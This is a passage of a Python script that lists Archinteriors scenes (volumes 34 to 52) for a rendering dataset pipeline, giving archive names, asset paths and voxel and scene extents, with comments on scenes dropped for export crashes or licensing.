scenes.append({"name": "ai_034_003", "archive_file": "AI34_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI34_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# generate_merged_gi_files.py is very slow
# scenes.append({"name": "ai_034_004", "archive_file": "AI34_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI34_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_034_005", "archive_file": "AI34_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI34_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_001", "archive_file": "AI35_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI35_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_002", "archive_file": "AI35_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI35_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_003", "archive_file": "AI35_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI35_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_004", "archive_file": "AI35_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI35_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_005", "archive_file": "AI35_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI35_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_006", "archive_file": "AI35_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI35_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_007", "archive_file": "AI35_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI35_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_008", "archive_file": "AI35_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI35_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_009", "archive_file": "AI35_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI35_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_035_010", "archive_file": "AI35_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI35_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_036_001", "archive_file": "AI36_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI36_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_036_002", "archive_file": "AI36_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI36_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_036_003", "archive_file": "AI36_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI36_003_2011"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_036_004", "archive_file": "AI36_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI36_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_036_005", "archive_file": "AI36_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI36_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_036_006", "archive_file": "AI36_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI36_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_036_007", "archive_file": "AI36_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI36_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_036_008", "archive_file": "AI36_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI36_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_036_009", "archive_file": "AI36_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI36_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_036_010", "archive_file": "AI36_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI36_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_001", "archive_file": "AI37_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI37_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_002", "archive_file": "AI37_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI37_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_003", "archive_file": "AI37_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI37_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_004", "archive_file": "AI37_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI37_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_005", "archive_file": "AI37_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI37_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_006", "archive_file": "AI37_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI37_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_007", "archive_file": "AI37_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI37_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_008", "archive_file": "AI37_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI37_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_009", "archive_file": "AI37_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI37_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_010", "archive_file": "AI37_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI37_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_038_001", "archive_file": "AI38_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI38_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_038_002", "archive_file": "AI38_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI38_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_038_003", "archive_file": "AI38_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI38_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_038_004", "archive_file": "AI38_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI38_004"), "normalization_policy": "v0", "scene_extent_meters": 300.0, "voxel_extent_meters": 1.0})
scenes.append({"name": "ai_038_005", "archive_file": "AI38_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI38_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_038_006", "archive_file": "AI38_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI38_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_038_007", "archive_file": "AI38_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI38_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_038_008", "archive_file": "AI38_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI38_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_038_009", "archive_file": "AI38_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI38_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_038_010", "archive_file": "AI38_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI_38_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_001", "archive_file": "AI39_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI39_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_002", "archive_file": "AI39_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI39_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_003", "archive_file": "AI39_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI39_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_004", "archive_file": "AI39_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI39_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_005", "archive_file": "AI39_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI39_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_006", "archive_file": "AI39_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI39_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_007", "archive_file": "AI39_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI39_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_008", "archive_file": "AI39_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI39_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_009", "archive_file": "AI39_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI39_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_010", "archive_file": "AI39_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI39_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
#
# Archinteriors volumes 40-49
#
# Archinteriors volume 40 is not distributed under the "Royalty Free Licence - All Extended Uses" license, so we exclude it
scenes.append({"name": "ai_041_001", "archive_file": "AI41_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI41_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_041_002", "archive_file": "AI41_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI41_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_041_003", "archive_file": "AI41_Scene_003.part1.rar", "asset_file": os.path.join("Scene_003", "AI41_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_041_004", "archive_file": "AI41_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI41_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_041_005", "archive_file": "AI41_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI41_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_041_006", "archive_file": "AI41_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI41_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_041_007", "archive_file": "AI41_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI41_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_041_008", "archive_file": "AI41_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI41_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_041_009", "archive_file": "AI41_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI41_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_041_010", "archive_file": "AI41_Scene_010.part1.rar", "asset_file": os.path.join("Scene_010", "AI41_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_042_001", "archive_file": "AI42_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI42_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_042_002", "archive_file": "AI42_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI42_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_042_003", "archive_file": "AI42_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI42_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_042_004", "archive_file": "AI42_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI42_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_042_005", "archive_file": "AI42_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI42_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_043_001", "archive_file": "AI43_001.rar", "asset_file": os.path.join("001", "AI43_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_043_002", "archive_file": "AI43_002.rar", "asset_file": os.path.join("002", "AI43_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_043_003", "archive_file": "AI43_003.rar", "asset_file": os.path.join("003", "AE43_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_043_004", "archive_file": "AI43_004.rar", "asset_file": os.path.join("004", "AI43_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_043_005", "archive_file": "AI43_005.rar", "asset_file": os.path.join("005", "AI43_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_043_006", "archive_file": "AI43_006.rar", "asset_file": os.path.join("006", "AI43_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_043_007", "archive_file": "AI43_007.rar", "asset_file": os.path.join("007", "AI43_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_043_008", "archive_file": "AI43_008.rar", "asset_file": os.path.join("008", "AI43_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_043_009", "archive_file": "AI43_009.rar", "asset_file": os.path.join("009", "AI43_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_043_010", "archive_file": "AI43_010.rar", "asset_file": os.path.join("010", "AI43_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_001", "archive_file": "AI44_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI44_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_002", "archive_file": "AI44_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI44_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_003", "archive_file": "AI44_Scene_003.part1.rar", "asset_file": os.path.join("Scene_003", "AI44_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_004", "archive_file": "AI44_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI44_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_005", "archive_file": "AI44_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI44_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_006", "archive_file": "AI44_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI44_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_007", "archive_file": "AI44_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI44_007"), "normalization_policy": "v0", "scene_extent_meters": 70.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_008", "archive_file": "AI44_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI44_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_009", "archive_file": "AI44_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI44_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_010", "archive_file": "AI44_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI44_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_045_001", "archive_file": "AI45_Scene_001.part1.rar", "asset_file": os.path.join("Scene_001", "AI45_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_045_002", "archive_file": "AI45_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI45_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_045_003", "archive_file": "AI45_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI45_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_045_004", "archive_file": "AI45_Scene_004.part1.rar", "asset_file": os.path.join("Scene_004", "AI45_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_045_005", "archive_file": "AI45_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI45_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_045_006", "archive_file": "AI45_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI45_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_045_007", "archive_file": "AI45_Scene_007.part1.rar", "asset_file": os.path.join("Scene_007", "AI45_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_045_008", "archive_file": "AI45_Scene_008.part1.rar", "asset_file": os.path.join("Scene_008", "AI45_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_045_009", "archive_file": "AI45_Scene_009.part1.rar", "asset_file": os.path.join("Scene_009", "AI45_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_045_010", "archive_file": "AI45_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI45_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_046_001", "archive_file": "AI46_Scene_001.rar", "asset_file": os.path.join("001", "AI46_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_046_002", "archive_file": "AI46_Scene_002.rar", "asset_file": os.path.join("002", "AI46_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_046_003", "archive_file": "AI46_Scene_003.rar", "asset_file": os.path.join("003", "AI46_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_046_004", "archive_file": "AI46_Scene_004.rar", "asset_file": os.path.join("004", "AI46_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_046_005", "archive_file": "AI46_Scene_005.rar", "asset_file": os.path.join("005", "AI46_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_046_006", "archive_file": "AI46_Scene_006.rar", "asset_file": os.path.join("006", "AI46_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_046_007", "archive_file": "AI46_Scene_007.rar", "asset_file": os.path.join("007", "AI46_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_046_008", "archive_file": "AI46_Scene_008.rar", "asset_file": os.path.join("008", "AI46_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_046_009", "archive_file": "AI46_Scene_009.rar", "asset_file": os.path.join("009", "AI46_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_046_010", "archive_file": "AI46_Scene_010.rar", "asset_file": os.path.join("010", "AI46_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_047_001", "archive_file": "AI47_001.rar", "asset_file": os.path.join("001", "AI47_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_047_002", "archive_file": "AI47_002.rar", "asset_file": os.path.join("002", "AI47_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_047_003", "archive_file": "AI47_003.rar", "asset_file": os.path.join("003", "AI47_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_047_004", "archive_file": "AI47_004.rar", "asset_file": os.path.join("004", "AI47_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_047_005", "archive_file": "AI47_005.rar", "asset_file": os.path.join("005", "AI47_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_047_006", "archive_file": "AI47_006.rar", "asset_file": os.path.join("006", "AI47_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_047_007", "archive_file": "AI47_007.rar", "asset_file": os.path.join("007", "AI47_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_047_008", "archive_file": "AI47_008.rar", "asset_file": os.path.join("008", "AI47_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_047_009", "archive_file": "AI47_009.rar", "asset_file": os.path.join("009", "AI47_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_047_010", "archive_file": "AI47_010.rar", "asset_file": os.path.join("010", "AI47_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_001", "archive_file": "Ai48_001.7z", "asset_file": os.path.join("001", "AI48_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_002", "archive_file": "Ai48_002.7z", "asset_file": os.path.join("002", "AI48_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_003", "archive_file": "Ai48_003.7z.001", "asset_file": os.path.join("003", "AI48_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_004", "archive_file": "Ai48_004.7z", "asset_file": os.path.join("004", "AI48_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_005", "archive_file": "Ai48_005.7z", "asset_file": os.path.join("005", "AI48_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_006", "archive_file": "Ai48_006.7z.001", "asset_file": os.path.join("006", "AI48_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_007", "archive_file": "Ai48_007.7z.001", "asset_file": os.path.join("007", "AI48_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_008", "archive_file": "Ai48_008.7z", "asset_file": os.path.join("008", "AI48_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_009", "archive_file": "Ai48_009.7z", "asset_file": os.path.join("009", "AI48_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_010", "archive_file": "Ai48_010.7z", "asset_file": os.path.join("010", "AI48_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# Archinteriors volume 49 appears to consist mostly of isolated objects rather than scenes, so we exclude it
#
# Archinteriors volumes 50-59
#
scenes.append({"name": "ai_050_001", "archive_file": "AI50_001.7z", "asset_file": os.path.join("001", "AI50_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_050_002", "archive_file": "AI50_002.7z", "asset_file": os.path.join("002", "AI50_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_050_003", "archive_file": "AI50_003.7z", "asset_file": os.path.join("003", "AI50_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_050_004", "archive_file": "AI50_004.7z", "asset_file": os.path.join("004", "AI50_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_050_005", "archive_file": "AI50_005.7z", "asset_file": os.path.join("005", "AI50_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_051_001", "archive_file": "AI51_001.7z", "asset_file": os.path.join("001", "AI51_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_051_002", "archive_file": "AI51_002.7z", "asset_file": os.path.join("002", "AI51_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_051_003", "archive_file": "AI51_003.7z.001", "asset_file": os.path.join("003", "AI51_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_051_004", "archive_file": "AI51_004.7z.001", "asset_file": os.path.join("004", "AI51_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_051_005", "archive_file": "AI51_005.7z.001", "asset_file": os.path.join("005", "AI51_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_052_001", "archive_file": "AI52_001.7z.001", "asset_file": os.path.join("001", "AI52_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_052_002", "archive_file": "AI52_002.7z.001", "asset_file": os.path.join("002", "AI52_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_052_003", "archive_file": "AI52_003.7z.001", "asset_file": os.path.join("003", "AI52_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
